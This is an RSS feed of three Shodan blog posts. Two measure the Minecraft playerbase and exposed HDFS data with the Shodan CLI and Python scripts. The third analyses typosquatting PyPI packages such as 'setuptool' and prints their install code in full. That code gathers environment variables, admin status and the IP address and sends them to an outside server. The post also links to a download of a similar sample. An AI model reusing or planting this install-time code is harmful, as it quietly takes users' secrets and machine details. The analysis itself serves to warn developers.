<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Python - Shodan Blog]]></title><description><![CDATA[The latest news and developments for Shodan.]]></description><link>https://blog.shodan.io/</link><generator>Ghost 0.7</generator><lastBuildDate>Thu, 09 Apr 2026 17:53:51 GMT</lastBuildDate><atom:link href="https://blog.shodan.io/tag/python/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Measuring the Minecraft Playerbase]]></title><description><![CDATA[<p>For fun I decided to see whether I can figure out how many Minecraft players are online at the moment. And it turns out that it's fairly straight-forward so here's how I did it.</p>

<p>As of now June 1st 2017 at 18:55 there are <strong>96,418</strong> players online on</p>]]></description><link>https://blog.shodan.io/measuring-the-minecraft-playerbase/</link><guid isPermaLink="false">4e4c6565-a24f-42bf-80bb-0c3839c3b87b</guid><category><![CDATA[minecraft]]></category><category><![CDATA[Python]]></category><category><![CDATA[CLI]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Fri, 02 Jun 2017 00:20:35 GMT</pubDate><media:content url="http://blog.shodan.io/content/images/2017/06/4453115-minecraft-wallpapers.jpg" medium="image"/><content:encoded><![CDATA[<img src="http://blog.shodan.io/content/images/2017/06/4453115-minecraft-wallpapers.jpg" alt="Measuring the Minecraft Playerbase"><p>For fun I decided to see whether I can figure out how many Minecraft players are online at the moment. And it turns out that it's fairly straight-forward so here's how I did it.</p>

<p>As of now June 1st 2017 at 18:55 there are <strong>96,418</strong> players online on public servers.</p>

<p>To get started I downloaded the latest list of Minecraft servers from Shodan:</p>

<pre><code>shodan download --limit -1 minecraft-servers product:minecraft port:25565
</code></pre>

<p>Now the next task is to parse that list of servers and request the number of players that are currently online. To speed things up the plan is to asynchronously perform the requests to the Minecraft servers using the <a href="http://www.gevent.org">gevent</a> library in Python. It lets you write code that looks synchronous but actually runs asynchronously which means you can perform many connections in parallel. This is the usual template I use when grabbing a bunch of data using gevent:</p>

<pre><code>#!/usr/bin/env python
#
# Shodan Async Workers

## Configuration
NUM_WORKERS = 100


# Make the stdlib async. This is where the gevent magic happens
import gevent.monkey
gevent.monkey.patch_all(subprocess=True, sys=True)


from gevent.pool import Pool
from shodan.helpers import iterate_files
from socket import setdefaulttimeout, socket, AF_INET, SOCK_STREAM

setdefaulttimeout(2.0)

def worker(banner):
    # Here's where you do the network stuff
    # Example:
    # con = socket(AF_INET, SOCK_STREAM)
    # con.connect((banner['ip_str']
    # con.send('hello world\n')
    # data = con.recv(5120)
    return True

def main(files):
    pool = Pool(NUM_WORKERS)

    # Loop through the banners in the file(s) and launch a worker
    # for each banner. When the pool is full it will cause the loop to
    # block until a worker finishes and opens up a spot in the pool.
    for banner in iterate_files(files):
        pool.spawn(worker, banner)

    # Wait for the workers to finish up
    pool.join()

    return True


if __name__ == '__main__':
    import sys
    sys.exit(main(sys.argv[1:])
</code></pre>

<p>If you're working with Shodan data files I recommend checking out the <strong>shodan.helpers.iterate_files()</strong> method since it'll make it easy for you to access the banners. You can give it either a single file:</p>

<pre><code>for banner in iterate_files('minecraft-data.json.gz'):
    ...
</code></pre>

<p>Or you can provide it a list of files:</p>

<pre><code>for banner in iterate_files(['minecraft-2017-04.json.gz', minecraft-2017-05.json.gz']):
    ...
</code></pre>

<p>To get the player count I added a method in the <em>worker()</em> that looks up the Minecraft info based on their <a href="http://wiki.vg/Protocol">current protocol</a> and kicked it off:</p>

<pre><code>$ python global-player-count.py minecraft-data.json.gz
96418
</code></pre>

<p>And that's how I'm now keeping track of how many players are at any moment online on Minecraft!</p>

<p>Note that this method only looks at Minecraft servers running on the default port (25565) and that are publicly-accessible on the Internet.</p>]]></content:encoded></item><item><title><![CDATA[The HDFS Juggernaut]]></title><description><![CDATA[<p>There's been much focus on MongoDB, Elastic and Redis in terms of data exposure on the Internet due to their general popularity in the developer community. However, in terms of data volume it turns out that HDFS is the real juggernaut. To give you a better idea here's a quick</p>]]></description><link>https://blog.shodan.io/the-hdfs-juggernaut/</link><guid isPermaLink="false">c469ddda-3cd3-48db-b4dc-a2d771993b61</guid><category><![CDATA[NoSQL]]></category><category><![CDATA[research]]></category><category><![CDATA[Python]]></category><category><![CDATA[HDFS]]></category><category><![CDATA[CLI]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Wed, 31 May 2017 17:32:11 GMT</pubDate><media:content url="http://blog.shodan.io/content/images/2017/05/hdfs-map-1600.png" medium="image"/><content:encoded><![CDATA[<img src="http://blog.shodan.io/content/images/2017/05/hdfs-map-1600.png" alt="The HDFS Juggernaut"><p>There's been much focus on MongoDB, Elastic and Redis in terms of data exposure on the Internet due to their general popularity in the developer community. However, in terms of data volume it turns out that HDFS is the real juggernaut. To give you a better idea here's a quick comparison between MongoDB and HDFS:</p>

<table>  
<thead>  
<tr>  
<th></th>  
<th>MongoDB</th>  
<th>HDFS</th>  
</tr>  
</thead>  
<tbody>  
<tr>  
<td>Number of Servers</td>  
<td>47,820</td>  
<td>4,487</td>  
</tr>  
<tr>  
<td>Data Exposed</td>  
<td>25 TB</td>  
<th>5,120 TB</th>  
</tr>  
</tbody>  
</table>

<p>Even though there are more MongoDB databases connected to the Internet without authentication in terms of data exposure it is dwarfed by HDFS clusters (25 TB vs 5 PB). Where are all these instances located?</p>

<script type="text/javascript" src="https://asciinema.org/a/6dzqir2jbssqftvcxwgh63dwp.js" id="asciicast-6dzqir2jbssqftvcxwgh63dwp" async></script>

<p>Most of the HDFS NameNodes are located in the US (1,900) and China (1,426). And nearly all of the HDFS instances are hosted on the cloud with Amazon leading the charge (1,059) followed by Alibaba (507).</p>

<p><img src="https://blog.shodan.io/content/images/2017/05/hdfs-map-600.png" alt="The HDFS Juggernaut"></p>

<p>The ransomware attacks on databases that were <a href="http://www.csoonline.com/article/3154190/security/exposed-mongodb-installs-being-erased-held-for-ransom.html">widely</a> <a href="https://www.fidelissecurity.com/threatgeek/2017/01/revenge-devops-gangster-open-hadoop-installs-wiped-worldwide">publicized</a> earlier in the year are still happening. And they're impacting both MongoDB and HDFS deployments. For HDFS, Shodan has discovered roughly <a href="https://www.shodan.io/search?query=NODATA4U_SECUREYOURSHIT">207 clusters</a> that have a message warning of the public exposure. And a quick glance at search results in Shodan reveals that most of the public MongoDB instances <a href="https://www.shodan.io/search?query=product%3Amongodb">seem to be compromised</a>. I've <a href="https://blog.shodan.io/its-the-data-stupid/">previously written</a> on the reason behind these exposures but note that both products nowadays have extensive documentation on <a href="https://docs.mongodb.com/manual/security/">secure deployment</a>.</p>

<h6 id="technicaldetails">Technical Details</h6>

<p>If you'd like to replicate the above findings or perform your own investigations into data exposure, this is how I measured the above.</p>

<ol>
<li><p>Download data using the <a href="https://cli.shodan.io">Shodan command-line interface</a>:</p>

<pre><code>shodan download --limit -1 hdfs-servers product:namenode
</code></pre></li>
<li><p>Write a Python script to measure the amount of exposed data (<strong>hdfs-exposure.py</strong>):</p>

<pre><code>from shodan.helpers import iterate_files, humanize_bytes
from sys import argv, exit


if len(argv) &lt;=1 :
    print('Usage: {} &lt;file1.json.gz&gt; ...'.format(argv[0]))
    exit(1)


datasize = 0
clusters = {}


# Loop over all the banners in the provided files
for banner in iterate_files(argv[1:]):
    try:
        # Grab the HDFS information that Shodan gathers
        info = banner['opts']['hdfs-namenode']
        cid = info['ClusterId']
        # Skip clusters we've already counted
        if cid in clusters:
            continue
        datasize += info['Used']
        clusters[cid] = True
    except:
        pass


print(humanize_bytes(datasize))
</code></pre></li>
<li><p>Run the Python script to get the amount of data exposed:</p>

<pre><code>$ python hdfs-exposure.py hdfs-data.json.gz
5.0 PB
</code></pre></li>
</ol>]]></content:encoded></item><item><title><![CDATA[Hostility in the Cheese Shop]]></title><description><![CDATA[<p>A user on Reddit noticed an <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/">odd package</a> in the Python Package Index, sometimes refererred to as the <a href="https://www.youtube.com/watch?v=B3KBuQHHKx0">Cheese Shop</a>. It's a package with the name <strong>setuptool</strong>, which a user might mistype when trying to install the popular <strong>setuptools</strong> package (note the <strong>s</strong> at the end). Instead of installing a</p>]]></description><link>https://blog.shodan.io/hostility-in-the-python-package-index/</link><guid isPermaLink="false">ffc39b5d-d427-4a33-b598-9dc83414d806</guid><category><![CDATA[Python]]></category><category><![CDATA[Reddit]]></category><dc:creator><![CDATA[John Matherly]]></dc:creator><pubDate>Sun, 22 Feb 2015 18:22:14 GMT</pubDate><media:content url="https://2.bp.blogspot.com/-sgDWeh6qpmA/UTg1O9yIb5I/AAAAAAAANBs/gn1nLMdMSI8/s1600/cheese-dubois-4.JPG" medium="image"/><content:encoded><![CDATA[<img src="https://2.bp.blogspot.com/-sgDWeh6qpmA/UTg1O9yIb5I/AAAAAAAANBs/gn1nLMdMSI8/s1600/cheese-dubois-4.JPG" alt="Hostility in the Cheese Shop"><p>A user on Reddit noticed an <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/">odd package</a> in the Python Package Index, sometimes refererred to as the <a href="https://www.youtube.com/watch?v=B3KBuQHHKx0">Cheese Shop</a>. It's a package with the name <strong>setuptool</strong>, which a user might mistype when trying to install the popular <strong>setuptools</strong> package (note the <strong>s</strong> at the end). Instead of installing a package to help  build, install and upgrade packages the user is installing a package that executes the following:</p>

<pre><code>def install(name):
    installed_package = name
    installed_at = datetime.datetime.utcnow()
    host_os = platform.platform()
    try:
        admin_rights = bool(os.getuid() == 0)
    except AttributeError:
        try:
            admin_rights = bool(ctypes.windll.shell32.IsUserAnAdmin() !=    0)
        except:
            admin_rights = False

    environ = os.environ

    if sys.version_info[0] == 3:
        import urllib.request
        from urllib.parse import urlencode
        GET = urllib.request.urlopen
    else:
        import urllib2
        from urllib import urlencode
        GET = urllib2.urlopen

    ipinfo = GET('http://ipinfo.io/json').read()

    try:
        data = {
            'ip': installed_package,
            'ia': installed_at,
            'ho': host_os,
            'ar': admin_rights,
            'env': environ,
            'ii': ipinfo
        }
        data = urlencode(data)
        r = GET('https://zzz.scrapeulous.com/r?',   data.encode('utf8')).read()
    except Exception as e:
        pass
</code></pre>

<p>The code determines whether the user is executing the installation as an administrator (<strong>admin<em>_</em>rights</strong>), which package is being installed since there are several of these hostile packages (<strong>installed<em>_</em>package</strong>), the environment variables (<strong>environ</strong>) and the IP address of the device (<strong>ipinfo</strong>). All the information is URL encoded and then sent to the server located at:</p>

<p><a href="https://zzz.scrapeulous.com/r?">https://zzz.scrapeulous.com/r?</a></p>

<p>According to the author of the website, these hostile packages are used as honeypots. Honeypots are usually setup to capture and analyze potentially malicious activities, I'm not sure what sort of malicious intent can be deduced from mistyping a package name (maybe that's why the author is grabbing the environment variables?). And the page explaining the intent as being for honeypots was only put up after the Reddit thread blew up. If this was to catch malicious scripts that had typos in them, he wouldn't have had to fake the package author information as well. Hopefully, the person behind this project will publish his research and explain the methodology. In addition to the <strong>setuptool</strong> package, the user also has other misnamed packages floating around one of which was <a href="https://www.reddit.com/r/Python/comments/2wr93b/this_one_looks_odd_doesnt_it/cotffhi">identified by chhantyal on Reddit</a>. This time it's catching people that are mistyping the <strong>requests</strong> package, which is a popular alternative package for performing HTTP requests. If a user types <strong>reqests</strong> instead of the real name, they get a similar script as above which you can <a href="https://mega.co.nz/#!QVg1iYZT!JX6s2wG3dVy_CDiZwHUvXBhSrHgLrpUt5vxfe9S-sr0">download here</a> since the affected packages have already been taken down.</p>

<p>The Python Cheese Shop doesn't ensure the packages are safe and doesn't have any safeguards against potential <a href="https://en.wikipedia.org/wiki/Typosquatting">typosquatting</a>. It would be interesting to see whether other package repositories for NodeJS or Ruby have also experienced typosquatting, if anybody reading this is aware of something please let me know! And if you're using Python, you should be <a href="http://docs.python-guide.org/en/latest/dev/virtualenvs/">using a virtual environment</a> to make sure no malicious code will run with administrative rights.</p>]]></content:encoded></item></channel></rss>